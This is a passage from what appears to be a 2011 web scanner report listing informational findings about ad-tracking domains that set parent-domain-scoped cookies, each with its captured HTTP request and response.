Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_o6zg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZkg8RmyafY39+OIzF9755x3W+AzJvvU=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UWJs=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKlxLHFKzz4/0koCkSq5JBQoSmi7zZNoLT0dEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgq9z/0E1nIO9J9fupr6fHiqjuefo+lRV1atV4Hbe4J0B6z/RoE1OlugGgSP3MMlt9IUJJODkKZG3Nw4/m9kHTtC0hHopLYwirAifOKc5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGbzaZd2dky0d4PEM7QRN8YWclW7vMsiT9xDxB5BqTRyycw9kjP7n9k0mBN23/26VyDWsQXbFP9hc6xcdJ56gbc9aoDyd417qJh1f5VYyOgv3kiC8XFanPbQJ092ArYD50B0UuBaXIAGAg5g=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
Set-Cookie: udm_0=MLvv7iXuYS5npS5IdtJ9rYUnBG1JihVUWLZDwXDpfLby5LNpTzBgDsiqygfVxd+K709LxniKKr1/Jh0PZqrISRqeT7E3J/DikjgckzjZlb25WiMcZffZLOF2S/dP5ZcaSUyjrK5OU8eE/Wavz/TpePFNMR347DHYy3XTsgP5SOgfLi2GwOwvgwSwPLVp1lF3lYOUw6f71CvjHp+Rh4fhQCYkGhqAutVPhz+vTCxd0qyoBvHmxrcfZeCR+WPhx0hLfBQHIyR0lAybjT7WrbQdKQ1p21mwmYaKqD2ggWy/bPOUy7AIPoEwDd9Al3GUd/6WwYb6ifbYlDYxeMF8Gs4bgf44Lpr3AhvptLLNqAoF2xQFpyDXjMmuv9hPf2Ycb7kEPXmvqczS7iXwY+vPDiWLLcpHGbvlx38UVHa9EG7ByiyAurjCyLYLxlbjjX/DO1uknbOYlan89xrt3PsPSCciR/gs9XSoA+k3/mLyBOxjg1ZwmWwNhi5JUchRIQG3tn1ian+yYvzGpRivBsNAhhDeX+STD7boBawdVLIKsdraSo/2y0nY1qbU; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:53 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

11.36. http://pixel.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1315097792; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match&mm_bnc,%20http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4e62cac5-3093-5789-301b-6f4e7fbf3921; ts=1315097285

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f38 32568
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 00:56:32 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315097792; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:32 GMT
Content-Length: 0

11.37. http://r.casalemedia.com/rum previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.casalemedia.com
Path:	/rum

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CMID=e9e8c1d58f5f3be19a1c66cf;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
CMRUM2=04000000002925993182975414771;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
CMST=TmLJ305izMYG;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:56:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rum?cm_dsp_id=4&external_user_id=2925993182975414771 HTTP/1.1
Host: r.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMS=102679&1315097055; CMSC=TmLJ3w**; CMDD=AAF1owE*; CMD1=AAFehU5iyd8AAZEXAAOXuwEBAA**; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMST=TmLJ305iysIC; CMIMP=102679&1315097282

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 00:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:38 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=e9e8c1d58f5f3be19a1c66cf;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
Set-Cookie: CMPS=054;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:56:38 GMT
Set-Cookie: CMPP=002;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:56:38 GMT
Set-Cookie: CMRUM2=04000000002925993182975414771;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
Set-Cookie: CMST=TmLJ305izMYG;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:56:38 GMT

GIF89a.............!.......,...........D..;

11.38. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 03-Sep-2013 00:56:48 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=2925993182975414771 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:48 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 03-Sep-2013 00:56:48 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.39. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=8071372312438671107; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:58:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=8071372312438671107; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:58:56 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:58:55 GMT

GIF89a.............!.......,...........D..;

11.40. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:47:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=ItQwH2bCmVTfAECOql6s6SBT_BPJF-JVRX_nTmRBhFpwzH1UaDhfAXHNoQU6yinlbmW-EFxMQzXn3d_bHBz1AQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:47:35 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1166786&t=2
Content-Length: 0
Date: Sun, 04 Sep 2011 00:47:35 GMT

11.41. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=6981538011179690654; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:57:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=6981538011179690654; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:57:37 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:57:36 GMT

GIF89a.............!.......,...........D..;

11.42. http://rma-api.gravity.com/v1/beacons/initialize previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rma-api.gravity.com
Path:	/v1/beacons/initialize

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vaguid=172d38ad2d9b9b5aa42030c637b39839; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 70
Date: Sun, 04 Sep 2011 01:01:00 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b39839');

11.43. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lgtix=BgABADMBSQABADMBHAADADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:52:19 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgdv12=1; lgdv6=1; lgdv95=1; lgdv73=1; lgtix=BgABADMBSQABADMBHAABADMBDAABADMB/QABADABXwABADMB

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:19 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAADADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:52:19 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

11.44. http://sync.adap.tv/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.adap.tv
Path:	/sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A57%3A27+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:44:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?type=gif&key=turn&uid=2925993182975414771 HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A44%3A51+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A59"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A57%3A27+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:44:07 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

11.45. http://sync.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1315097752; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:52 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
